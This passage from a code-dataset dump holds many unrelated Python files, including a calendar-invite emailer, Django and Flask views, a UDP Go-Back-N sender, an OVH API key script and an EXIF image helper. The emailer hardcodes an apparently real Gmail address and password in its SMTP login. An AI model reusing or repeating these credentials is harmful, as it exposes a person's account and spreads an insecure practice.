0))))\r\n #event['uid'] = self.get_unique_id() # Generate some unique ID\r\n event.add('priority', 5)\r\n event.add('sequence', 1)\r\n event.add('created', tz.localize(dt.datetime.now()))\r\n\r\n # Add a reminder\r\n alarm = icalendar.Alarm()\r\n alarm.add(\"action\", \"DISPLAY\")\r\n alarm.add('description', \"Reminder\")\r\n # The only way to convince Outlook to do it correctly\r\n alarm.add(\"TRIGGER;RELATED=START\", \"-PT{0}H\".format(24)) #reminder_hours\r\n event.add_component(alarm)\r\n cal.add_component(event)\r\n\r\n # Build the email message and attach the event to it\r\n msg = MIMEMultipart(\"alternative\")\r\n\r\n msg[\"Subject\"] = subj\r\n msg[\"From\"] = organiser_email\r\n msg[\"To\"] = attendee_email\r\n msg[\"Content-class\"] = \"urn:content-classes:calendarmessage\"\r\n\r\n msg.attach(MIMEText(description))\r\n part_email = MIMEText('calendar;method=REQUEST') #this lines are for \r\n msg.attach(part_email) # outlook make it as calender #remove this lines for sending mail to gmail\r\n filename = \"invite.ics\"\r\n part = MIMEBase('text', \"calendar\", method=\"REQUEST\", name=filename)\r\n part.set_payload( cal.to_ical() )\r\n email.encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', filename) #content discription\r\n part.add_header(\"Content-class\", \"urn:content-classes:calendarmessage\")\r\n part.add_header(\"Filename\", filename)\r\n part.add_header(\"Path\", filename)\r\n msg.attach(part)\r\n\r\n # Send the email out\r\n s = smtplib.SMTP('smtp.gmail.com',587)\r\n s.starttls()\r\n s.login(\"eswar.bbid@gmail.com\",\"eswar@1234\")\r\n s.sendmail(msg[\"From\"], [msg[\"To\"]], msg.as_string())\r\n s.quit()\r\n\r\n\r\n\r\nsend_appointment(date = today,attendee_email=\"eswar.kalakata@gmail.com\",organiser_email=\"eswar.bbid@gmail.com\",subj=\"python_practice\",description=\"outlook calender should be done \",location=\"madhapur\",start_hour= 1, start_minute= 55)\r\n'''import pytz\r\nfor tz in pytz.all_timezones:\r\n print(tz)'''\r\n\r\n\r\n","sub_path":"calender_email.py","file_name":"calender_email.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227533845","text":"# coding=utf-8\n\n# Create your views here.\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nimport json\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom app.customer.models.user import LuckIDInfo\n\n\n@login_required()\ndef lucknum_list(request):\n qd = request.GET\n lucknums = LuckIDInfo.objects.all().order_by('user_id')\n return render(request, 'lucknum/list.html', {'lucknums': lucknums})\n\n# 创建或修改\n@login_required()\ndef lucknum_new(request):\n if request.method == 'POST':\n qd = request.POST\n user_id = qd.get('user_id', \"\")\n id_type = qd.get('id_type', '')\n id_level = qd.get('id_level', '')\n id_assign = qd.get('id_assign', '')\n\n return HttpResponseRedirect(reverse(\"lucknum_list\"))\n else:\n qd = request.GET\n user_id = qd.get('user_id', \"\")\n id_type = 0\n id_level = 0\n id_assign = 0\n\n return render(request, 'lucknum/edit.html', {'user_id': user_id, 'id_type': id_type,'id_level':id_level,'id_assign':id_assign})","sub_path":"app/customer/views/lucknum.py","file_name":"lucknum.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"4419355","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n\t#Leave as empty string for base url\n\tpath('', views.home, name=\"home\"),\n\tpath('main/', views.main, name=\"main\"),\n\tpath('cart/', views.cart, name=\"cart\"),\n\tpath('checkout/', views.checkout, name=\"checkout\"),\n\tpath('men/', views.men, name=\"men\"),\n\tpath('women/', views.women, name=\"women\"),\n\tpath('durability/', views.durability, name=\"durability\"),\n\n \n]\n","sub_path":"ecommerce/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"320024536","text":"from selenium import selenium\nimport unittest, time, re\n\nclass add_1st_opportunity(unittest.TestCase):\n def setUp(self):\n self.verificationErrors = []\n self.selenium = selenium(\"localhost\", 4444, \"*chrome\", \"http://change-this-to-the-site-you-are-testing/\")\n self.selenium.start()\n \n def test_add_1st_opportunity(self):\n sel = self.selenium\n sel.open(\"/main_app\")\n sel.click(\"link=Add Opportunities\")\n sel.wait_for_page_to_load(\"30000\")\n sel.type(\"id_name\", \"Opportunity 1\")\n sel.type(\"id_amount\", \"$400\")\n sel.select(\"id_rate\", \"label=Annual\")\n sel.type(\"id_web\", \"www.opportunity1.com\")\n sel.click(\"id_cover\")\n sel.select(\"id_application\", \"label=Mail\")\n sel.type(\"id_instruction\", \"instructins\")\n sel.type(\"id_description\", \"decription\")\n sel.select(\"id_type\", \"label=Full time\")\n sel.click(\"//input[@value='submit']\")\n \n def tearDown(self):\n self.selenium.stop()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"add_1st_opportunity.py","file_name":"add_1st_opportunity.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650753105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/12/1 9:24\n# @Author : fangjie\n# @email : 838379742@qq.com\n# @File : views.py\n__metaclass__ = type\nfrom flask import render_template,url_for,request\nfrom . import main\nfrom ..models import Article, Category,Setting\nfrom .. import db\nfrom collections import OrderedDict\n\n\n@main.route('/')\ndef index():\n page=request.args.get('page',1,type=int)\n setting=Setting.query.all()[0]\n pagination=Article.query.order_by(Article.timestamp.desc()).paginate(page,per_page=20,error_out=False)\n articles=pagination.items\n navbar=getNavbar()\n return render_template('main/index.html',articles=articles,pagination=pagination,navbar=navbar,setting=setting)\n\n\n@main.route('//',methods=['GET','POST'])\ndef article(name,article_id):\n article=Article.query.filter_by(id=article_id).first()\n setting = Setting.query.all()[0]\n navbar = getNavbar()\n breadcrumb=getBreadcrumb(article_id)\n return render_template('main/article.html',article=article,navbar=navbar,breadcrumb=breadcrumb,setting=setting)\n\ndef getBreadcrumb(article_id):\n first_category_id=Article.query.filter_by(id=article_id).all()[0].first_category_id\n second_category_id=Article.query.filter_by(id=article_id).all()[0].second_category_id\n first_category=Category.query.filter_by(id=first_category_id).all()[0]\n second_category = Category.query.filter_by(id=second_category_id).all()\n if second_category!=[]:\n second_category=second_category[0]\n return [first_category,second_category]\n else:\n return [first_category]\n\n@main.route('/artilce/',methods=['GET','POST'])\ndef list(name):\n page = request.args.get('page', 1, type=int)\n category_id=Category.query.filter_by(url_name=name).all()[0].id\n if Category.query.filter_by(id=category_id).all()[0].father_node==0:\n pagination=Article.query.filter_by(first_category_id=category_id).order_by(Article.timestamp.desc()).paginate(page, per_page=20, error_out=False)\n else:\n pagination = Article.query.filter_by(second_category_id=category_id).order_by(Article.timestamp.desc()).paginate(page, per_page=20, error_out=False)\n articles = pagination.items\n navbar = getNavbar()\n setting = Setting.query.all()[0]\n return render_template('main/index.html',articles=articles,pagination=pagination,navbar=navbar,setting=setting)\n\n\n\ndef getNavbar():\n categories=OrderedDict()\n for father_node in Category.query.filter_by(father_node='0').order_by(db.asc(Category.id)).all():\n child_nodes=[]\n if Category.query.filter_by(father_node=father_node.id).all()!=[]:\n for ca in Category.query.filter_by(father_node=father_node.id).all():\n child_nodes.append(ca)\n categories[father_node]=child_nodes\n return categories","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331453367","text":"import sys\r\nimport random\r\nimport socket\r\nimport _thread\r\nimport time\r\nfrom timer import Timer\r\n\r\nraddr = ('localhost', 8080)\r\nsaddr = ('localhost', 0)\r\nsleep = 0.05\r\ntout = 0.5\r\nsend_timer = Timer(tout)\r\nwin_size = 7\r\nnext_frame_to_send = 0\r\nbase = 0\r\nmutex = _thread.allocate_lock()\r\nerrp = 10 #error prob of data packet\r\ndrop = 20 #drop probability due to network issues\r\n\r\n# Creates a packet from a sequence number and byte data\r\ndef make(seq_num, data = b''):\r\n seq_bytes = seq_num.to_bytes(4, byteorder = 'little', signed = True)\r\n if random.randint(1, errp) > 1:\r\n \terr_bytes = (0).to_bytes(4, byteorder = 'little', signed = True)\r\n else:\r\n \terr_bytes = (1).to_bytes(4, byteorder = 'little', signed = True)\r\n return seq_bytes + err_bytes + data\r\n\r\n# Creates an empty packet\r\ndef make_empty():\r\n return b''\r\n\r\n# Extracts sequence number and data from a non-empty packet\r\ndef extract(packet):\r\n seq_num = int.from_bytes(packet[0:4], byteorder = 'little', signed = True)\r\n err = int.from_bytes(packet[4:8], byteorder = 'little', signed = True)\r\n return seq_num, err, packet[8:]\r\n\r\n# Send thread\r\ndef send(sock, filename):\r\n\tglobal mutex\r\n\tglobal base\r\n\tglobal send_timer\r\n\r\n # Open the file\r\n\ttry:\r\n\t\tfile = open(filename, 'rb')\r\n\texcept IOError:\r\n\t\tprint('File Not Found')\r\n\t\treturn\r\n \r\n # Add all the packets to the buffer\r\n\tpbuffer = []\r\n\tseq_num = 0\r\n\r\n\twhile True:\r\n\t\tpkt_size = random.randint(512,1024)\r\n\t\tdata = file.read(pkt_size)\r\n\t\tif not data: break\r\n\t\tpbuffer.append(make(seq_num, data))\r\n\t\tseq_num += 1\r\n\r\n\tnum_pkts = len(pbuffer)\r\n\twin_size = 7\r\n\twin_size = min(win_size, num_pkts-base)\r\n\tnext_frame_to_send = 0\r\n\tbase = 0\r\n\r\n # Start the receiver thread\r\n\t_thread.start_new_thread(receive, (sock,))\r\n\r\n\twhile (base < num_pkts):\r\n\t\tmutex.acquire()\r\n # Send all the pbuffer in the window\r\n\t\twhile (next_frame_to_send < base + win_size):\r\n\t\t\tif (random.randint(1, drop) > 1):\r\n\t\t\t\tsock.sendto(pbuffer[next_frame_to_send],raddr)\r\n\t\t\tnext_frame_to_send += 1\r\n\r\n # Start the timer\r\n\t\tif (not send_timer.running()):\r\n\t\t\tsend_timer.start()\r\n\r\n # Wait until a timer goes off or we get an ACK\r\n\t\twhile (send_timer.running() and not send_timer.timeout()):\r\n\t\t\tmutex.release()\r\n\t\t\ttime.sleep(sleep)\r\n\t\t\tmutex.acquire()\r\n\r\n\t\tif (send_timer.timeout()): #Timeout\r\n\t\t\tsend_timer.stop();\r\n\t\t\tnext_frame_to_send = base\r\n\t\telse:\r\n\t\t\twin_size = min(win_size, num_pkts-base)\r\n\t\tmutex.release()\r\n\r\n # Send empty packet as end of file\r\n\tsock.sendto(make_empty(),raddr)\r\n\tfile.close()\r\n \r\n# Receive thread\r\ndef receive(sock):\r\n global mutex\r\n global base\r\n global send_timer\r\n\r\n while True:\r\n pkt, _ = sock.recvfrom(1024);\r\n ack, error, _ = extract(pkt);\r\n\r\n # If we get an ACK for the first packet\r\n if (error == 0):\r\n\t if (ack >= base):\r\n\t mutex.acquire()\r\n\t base = ack + 1\r\n\t send_timer.stop()\r\n\t mutex.release()\r\n\t else:\r\n\t \tmutex.acquire()\r\n\t \tsend_timer.stop();\r\n\t \tnext_frame_to_send = base\r\n\t \tmutex.release()\r\n\r\nif __name__ == '__main__':\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\tsock.bind(saddr)\r\n\tfilename = sys.argv[1]\r\n\tsend(sock,filename)\r\n\tsock.close()","sub_path":"sender2.py","file_name":"sender2.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1162827","text":"\"\"\"\nПрограмма принимает действительное положительное число x и целое отрицательное число y.\nНеобходимо выполнить возведение числа x в степень y. Задание необходимо реализовать в виде функции my_func(x, y).\nПри решении задания необходимо обойтись без встроенной функции возведения числа в степень.\n\"\"\"\n\n\n# Решение №1\ndef pow_1(a: int, n: int) -> float:\n return a ** n\n\n\n# Решение №2\ndef pow_2(a: int, n: int) -> float:\n answer = 1\n for i in range(abs(n)):\n answer *= a\n if n > 0:\n return answer\n elif n < 0:\n return 1 / answer\n else:\n return 1\n\n\n# Решение №3\ndef pow_3(a: int, n: int) -> float:\n if n == 0:\n return 1\n elif n < 0:\n return 1 / a * pow_3(a, n + 1)\n else:\n return a * pow_3(a, n - 1)\n\n\nif __name__ == \"__main__\":\n print(pow_1(2, -5))\n print(pow_2(2, -5))\n print(pow_3(2, -5))\n","sub_path":"Lesson3/base_les3_4.py","file_name":"base_les3_4.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155268549","text":"# -*- encoding: utf-8 -*-\n\nimport requests\nimport sys\nimport json\n\ndef __get_key(app_key, authorisation):\n data = '{{ \"accessRules\": {json_data} }}'.format(json_data = json.dumps(authorisation))\n # print(data)\n\n r = requests.post(\"https://eu.api.ovh.com/1.0/auth/credential\",\n headers = {\n \"X-Ovh-Application\" : app_key,\n \"Content-type\" : \"application/json\"\n },\n data = data)\n\n print(r.content)\n\n# this file provide ovh credential to admin\n# dns entry point\ndef dns(app_key, dns_list):\n\n authorisation = []\n for dns in dns_list.split(\",\"):\n authorisation.append({ \"method\" : \"POST\", \"path\": f\"/domain/zone/{dns}/*\" })\n authorisation.append({ \"method\" : \"DELETE\", \"path\": f\"/domain/zone/{dns}/*\" })\n\n __get_key(app_key, authorisation)\n\n\ndef network(app_key, projects_list):\n authorisation = []\n for serviceName in projects_list.split(\",\"):\n authorisation.append({ \"method\" : \"GET\", \"path\": f\"/cloud/project/{serviceName}/instance\" })\n authorisation.append({ \"method\" : \"POST\", \"path\": f\"/cloud/project/{serviceName}/ip/*\" })\n authorisation.append({ \"method\" : \"GET\", \"path\": f\"/cloud/project/{serviceName}/ip/*\" })\n __get_key(app_key, authorisation)\n\ndef telephony(app_key, projects_list):\n authorisation = []\n authorisation.append({ \"method\" : \"GET\", \"path\": f\"/telephony/*\" })\n for billingAccount in projects_list.split(\",\"):\n authorisation.append({ \"method\" : \"POST\", \"path\" : f\"/telephony/{billingAccount}/service/*\"})\n authorisation.append({ \"method\" : \"POST\", \"path\" : f\"/telephony/{billingAccount}/eventToken\"})\n\n __get_key(app_key, authorisation)\n\ndef usage():\n print(\"\"\"usage OPTION ...\nOPTIONS can be :\n- dns app_key dns1[,dns2...]\n- network app_key project1[,project2...]\n- telephony app_key\n\"\"\")\n\ndef main():\n if len(sys.argv) == 4 :\n if sys.argv[1] == \"dns\":\n dns(sys.argv[2], sys.argv[3])\n elif sys.argv[1] == \"network\":\n network(sys.argv[2], sys.argv[3])\n elif sys.argv[1] == \"telephony\":\n telephony(sys.argv[2], sys.argv[3])\n else:\n usage()\n\n else:\n usage()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ovh_cli/credential.py","file_name":"credential.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242073034","text":"import numpy as np\nimport exifread\nimport piexif\nfrom PIL import Image as pImage, ImageDraw\nimport deepGeoUtils as utils\n\n\nclass Image:\n def __init__(self, url, image_path):\n self._path_ = utils.create_folder(image_path)\n self._thumbnail_path_ = utils.create_folder(self._path_ + 'thumbnail')\n self._file_name_ = utils.download_image(url, image_path)\n self.mask = [None, None]\n self._exif_ = self._extract_exif_()\n self._width_ = 0\n self._height_ = 0\n self._create_thumbnail_()\n if \"Image Orientation\" in (self._exif_.keys()):\n self._save_(_path=self._path_+self._file_name_,\n is_new=False,\n image=utils.image_roataion(self._open_(), self._exif_['Image Orientation']))\n\n def _save_(self, _path, is_new=True, image=None):\n if is_new:\n ext = self._file_name_.split(\".\")[-1]\n path_ = utils.create_folder(_path)\n name = utils.create_name(ext, path_)\n path = path_ + name\n else:\n path = _path\n bexif = self._extract_bexif_()\n if image is None:\n return False\n if bexif is None:\n image.save(path)\n else:\n image.save(path, exif=bexif)\n return path\n\n def _open_(self):\n return pImage.open(self._path_ + self._file_name_).convert('RGB')\n\n def _create_thumbnail_(self):\n image = self._open_()\n self._width_, self._height_ = image.size\n size = (256, 256)\n try:\n image.thumbnail(size)\n except:\n pass\n self._save_(image=image, is_new=False, _path=self._thumbnail_path_+self._file_name_)\n\n def _extract_exif_(self):\n with open(self._path_ + self._file_name_, 'rb') as f:\n tags = exifread.process_file(f, details=False)\n return tags\n\n def _extract_bexif_(self):\n image = self._open_()\n try:\n exif_dict = piexif.load(image.info[\"exif\"])\n exif_bytes = piexif.dump(exif_dict)\n except Exception as es:\n print(es, \" Exif is not include\")\n exif_bytes = None\n return exif_bytes\n\n def _set_mask_(self, masks, colors):\n y, x, z = self.to_array().shape\n self.mask[0] = np.zeros((y, x, z + 1))\n if masks is not None:\n self.mask[0] = utils.set_mask(self.mask[0], masks, colors)\n self.mask[0] = pImage.fromarray(np.uint8(self.mask[0]))\n self.mask[1] = ImageDraw.Draw(self.mask[0])\n\n def _set_text_(self, text, point, color):\n set_color = (color[0], color[1], color[2])\n self.mask[1].text(point, text, fill=set_color)\n\n def _set_box_(self, box, color):\n y1, x1, y2, x2 = box\n set_color = (color[0], color[1], color[2])\n self.mask[1].rectangle([x1, y1, x2, y2], outline=set_color)\n\n def get_file_name(self):\n return self._file_name_\n\n def get_location(self, is_point=False):\n exif = self._exif_\n lon=None\n lat=None\n if \"GPS GPSLongitude\" in exif.keys():\n ref = None\n if \"GPS GPSLongitudeRef\" in exif.keys():\n ref = exif[\"GPS GPSLongitudeRef\"]\n lon = utils.exif_to_data(exif[\"GPS GPSLongitude\"], ref)\n if \"GPS GPSLatitude\" in exif.keys():\n ref = None\n if \"GPS GPSLatitudeRef\" in exif.keys():\n ref = exif[\"GPS GPSLatitudeRef\"]\n lat = utils.exif_to_data(exif[\"GPS GPSLatitude\"], ref)\n if lon is not None:\n if is_point:\n return \"POINT(\" + str(lon) + \" \" + str(lat) + \")\"\n else:\n return {\"Longitude\": lon, \"Latitude\": lat}\n else:\n return None\n\n def get_direction(self, is_json=False):\n exif = self._exif_\n if \"GPS GPSImgDirection\" in exif.keys():\n data = utils.exif_to_data(exif[\"GPS GPSImgDirection\"], exif[\"GPS GPSImgDirectionRef\"])\n if is_json:\n return {\"Direction\": data}\n else:\n return data\n else:\n return None\n\n def get_distance(self, is_json=False):\n exif = self._exif_\n if \"GPS GPSDestDistance\" in exif.keys():\n distance = utils.exif_to_data(exif[\"GPS GPSDestDistance\"], exif[\"GPS GPSDestDistance\"])\n if is_json:\n return {\"Distance\": distance}\n else:\n return distance\n else:\n return None\n\n def get_altitude(self, is_json=False):\n exif = self._exif_\n if \"GPS GPSAltitude\" in exif.keys():\n altitude = utils.exif_to_data(exif[\"GPS GPSAltitude\"], exif[\"GPS GPSAltitudeRef\"])\n if is_json:\n return {\"Direction\": altitude}\n else:\n return altitude\n else:\n return None\n\n def get_datetime(self, is_json=False, is_timestamp=False):\n exif = self._exif_\n if \"Image DateTime\" in exif.keys():\n date_ = str(exif[\"Image DateTime\"]).split(\" \")\n timestamp = date_[0].replace(\":\", '-') + \" \" + date_[1]\n timestamp = utils.check_format_date(timestamp)\n else:\n timestamp = \"1970-01-01 00:00:00\"\n if is_timestamp:\n timestamp = utils.datatime_to_timestamp(timestamp)\n if is_json:\n return {\"DateTime\": timestamp}\n else:\n return timestamp\n\n def get_fov(self, view_ang=66, distance=100):\n loc = self.get_location()\n dirc = self.get_direction()\n dist = distance\n if dist is 100 or dist is None:\n dist = self.get_distance()\n if dist is None:\n dist = 100\n return utils.data_to_polygon(loc['Longitude'], loc['Latitude'], dirc, dist, view_ang)\n\n def get_size(self, is_json=False):\n if is_json:\n return {\"width\": self._width_, \"height\": self._height_}\n else:\n return self._width_, self._height_\n\n def on_draw(self, path, boxes=None, masks=None, class_ids=None, scores=None, class_names=None, box_show=True):\n n = len(boxes)\n if n > 0:\n colors = utils.create_colors(n)\n self._set_mask_(masks, colors)\n for i in range(n):\n if class_ids is not None:\n y1, x1, _, _ = boxes[i]\n score = \"\"\n if scores is not None:\n score = \" (\"+str(scores[i])+\")\"\n self._set_text_(class_names[class_ids[i]]+score, (x1, y1), colors[i])\n if box_show is True:\n self._set_box_(boxes[i], colors[i])\n image = self._open_().convert(\"RGBA\")\n mask_image = self.mask[0]\n if mask_image:\n image = pImage.alpha_composite(image, mask_image)\n return self._save_(path, image=image.convert(\"RGB\"))\n\n def to_array(self):\n image = self._open_()\n if image is not None:\n return np.array(image)\n else:\n return None\n","sub_path":"deepgeo/src/deepGeoImage.py","file_name":"deepGeoImage.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646770378","text":"import numpy as np\n\nclass EnergyCalibration(object):\n def __init__(self, positions, energies):\n self.pos = positions\n self.energies = energies\n\n\n def getAxis(self, x, out = None):\n fitting_degree = 3\n coeff = np.polyfit(self.pos, self.energies, fitting_degree)\n if out is None:\n return np.poly1d(coeff)(x), None\n else:\n out['ea'], out['fit'] = np.poly1d(coeff)(x), None\n","sub_path":"nosey/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326999945","text":"\"\"\"\ntrack 1\n所有人一个东西都不买\n\nformat:\nid,category\n1,1 1 1 0 1 0 0 0 0\n\nauthor: lzhbrian (https://lzhbrian.me)\ndate: 2021.7.13\n\"\"\"\nfrom tqdm import tqdm\n\noutput_filename = '../submission_track1/all_purchase_0items_track1_20210713.csv'\n\nNUM_USERS = 206254\nPOP_EXPOSE_LIST = '0 0 0 0 0 0 0 0 0'\n\nfp = open(output_filename, 'w')\nprint('id,category', file=fp)\nfor i in tqdm(range(1, NUM_USERS + 1)):\n\tprint('%s,%s' % (i, POP_EXPOSE_LIST), file=fp)\n","sub_path":"code/all_purchase_0items_track1_20210713.py","file_name":"all_purchase_0items_track1_20210713.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596148056","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nfrom io import StringIO\nimport csv\n\n\nfrom pdfminer.pdfinterp import PDFResourceManager, process_pdf\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom io import open\n\n\ndef readText1():\n # textPage = urlopen('http://www.pythonscraping.com/pages/warandpeace/chapter1.txt')\n textPage = urlopen('http://www.pythonscraping.com/pages/warandpeace/chapter1-ru.txt')\n\n print( str(textPage.read(), 'utf-8') )\n\ndef readText2():\n html = urlopen(\"http://en.wikipedia.org/wiki/Python_(programming_language)\")\n bsObj = BeautifulSoup(html, 'lxml')\n content = bsObj.find(\"div\", {\"id\": \"mw-content-text\"}).get_text()\n content = bytes(content, 'UTF-8')\n content = content.decode('UTF-8')\n\n print( content )\n\ndef readCSV():\n data = urlopen(\"http://pythonscraping.com/files/MontyPythonAlbums.csv\").read().decode('ascii', 'ignore')\n dataFile = StringIO(data)\n # csvReader = csv.reader(dataFile)\n #\n # for row in csvReader:\n # print(\"The album \\\"\" + row[0] + \"\\\" was released in \" + str(row[1]))\n\n\n dictReader = csv.DictReader(dataFile)\n print(dictReader.fieldnames)\n for row in dictReader:\n print(row)\n\ndef readPDF(pdfFile):\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, laparams=laparams)\n\n process_pdf(rsrcmgr, device, pdfFile)\n device.close()\n\n content = retstr.getvalue()\n retstr.close()\n return content\n#\n# pdfFile = urlopen(\"http://pythonscraping.com/pages/warandpeace/chapter1.pdf\")\n# # pdfFile = open(\"../Python网络数据采集.pdf\", 'rb')\n# outputString = readPDF(pdfFile)\n# print( outputString )\n# pdfFile.close()\n\nfrom zipfile import ZipFile\nfrom io import BytesIO\n\ndef readDocx(pdfPath):\n wordFile = urlopen(pdfPath).read()\n wordFile = BytesIO(wordFile)\n document = ZipFile(wordFile)\n xml_content = document.read('word/document.xml')\n\n wordObj = BeautifulSoup( xml_content.decode('utf-8'), 'lxml' )\n textStrings = wordObj.findAll('w:t')\n for textElem in textStrings:\n print( textElem.text )\n\nreadDocx('http://pythonscraping.com/pages/AWordDocument.docx')","sub_path":"pythonscrapy/009.py","file_name":"009.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330057394","text":"import json\r\nimport requests\r\n\r\nurl = input(\"Enter url : \")\r\n\r\nrequest = requests.get(url)\r\n\r\ndata_in_text = request.text\r\n\r\ndata = json.loads(data_in_text)\r\n\r\nfile_name = input(\"Enter file name : \")\r\n\r\njson_file = file_name+\".json\"\r\n\r\njson.dump(data , open(json_file,\"w\"))","sub_path":"PythonProgramsTraining/download_json_data.py","file_name":"download_json_data.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12412684","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom pages import (\n overview,\n exploration,\n magnitud,\n relacion_otros_fenomenos,\n visualizacion_3D)\n# Connect to main app.py file\nfrom app import app\nimport pandas as pd\nimport plotly.express as px\n\n# Describe the layout/ UI of the app\napp.layout = html.Div(\n [dcc.Location(id=\"url\", refresh=False), html.Div(id=\"page-content\")]\n)\napp.config.suppress_callback_exceptions = True\n\n\n# Update page\n@app.callback(Output(\"page-content\", \"children\"), [Input(\"url\", \"pathname\")])\ndef display_page(pathname):\n\n if pathname == \"/dash-earthquake-analysis/magnitud\":\n return magnitud.layout\n elif pathname == \"/dash-earthquake-analysis/visualizacion-3d\":\n return visualizacion_3D.layout\n elif pathname == \"/dash-earthquake-analysis/relacion-otros-fenomenos\":\n return relacion_otros_fenomenos.layout\n elif pathname == \"/dash-earthquake-analysis/exploration\":\n return exploration.create_layout(app)\n else:\n return overview.create_layout(app)\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","sub_path":"eda/jose/dash-earthquake-analysis/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347173565","text":"\"\"\"webempresa URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\n\n\n#from core import views\n\nurlpatterns = [\n # Paths del Core en core/urls.py (La hemos creado para organizar mejor)\n path('', include('core.urls')), #esto esta en la documentacion de arriba\n\n # Paths del services en services/urls.py (La hemos creado para organizar mejor)\n path('services/', include('services.urls')), #esto esta en la documentacion de arriba\n\n # Paths del blog en blog/urls.py (La hemos creado para organizar mejor)\n path('blog/', include('blog.urls')), #esto esta en la documentacion de arriba\n\n # Paths del pages en pages/urls.py (La hemos creado para organizar mejor)\n path('page/', include('pages.urls')), #esto esta en la documentacion de arriba\n\n\n # Paths del contact en contact/urls.py (La hemos creado para organizar mejor)\n path('contact/', include('contact.urls')), #esto esta en la documentacion de arriba\n\n #Path del admin\n path('admin/', admin.site.urls), \n]\n\n# Para acceder a los media en DESARROLLO: Si La variable DEBUG esta TRUE (en DE S)\nif settings.DEBUG:\n from django.conf.urls.static import static #permite servir ficheros estaticos\n\n # tenemos que decirle a los urlpatterns que les sirva los ficheros solicitados. Busca en MEDIA_ROOT y los sirve en MEDIA_URL\n urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) \n","sub_path":"webempresa/webempresa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327980060","text":"#!/usr/bin/env python\n\nfrom configparser import ConfigParser\nimport bot_constants\nimport os\nimport logging\n\n\nclass BotfriendData:\n \"\"\"\n This is Botfriend's knowledge store.\n Constants and static method data related to\n responding or processing go here. Provides data for the API calls\n\n \"\"\"\n def __init__(self):\n\n # Clean this up\n\n c = ConfigParser()\n bc = bot_constants.BotConstants()\n self.config = c.read('botfriend.conf')\n self.config_file = 'botfriend.conf'\n self.greeting_keywords = bc.GREETING_KEYWORDS\n self.greeting_responses = bc.GREETING_RESPONSES\n self.monikers = bc.MONIKERS\n self.saved_user_data = c.read('savedUserData.conf')\n self.saved_user_data_file = 'savedUserData.conf'\n\n def writeConfig(self):\n if os.path.isfile(self.config_file):\n os.rename(self.config_file, self.config_file+ \".bak\")\n logging.info(\"Writing to ConfigFile with new data\")\n with open(self.config_file, 'w') as configFile:\n self.config.write(configFile)\n\n\nclass Botfriend:\n\n # Main botfriend class\n\n def __init__(self, BotfriendData):\n\n self.BotfriendData = 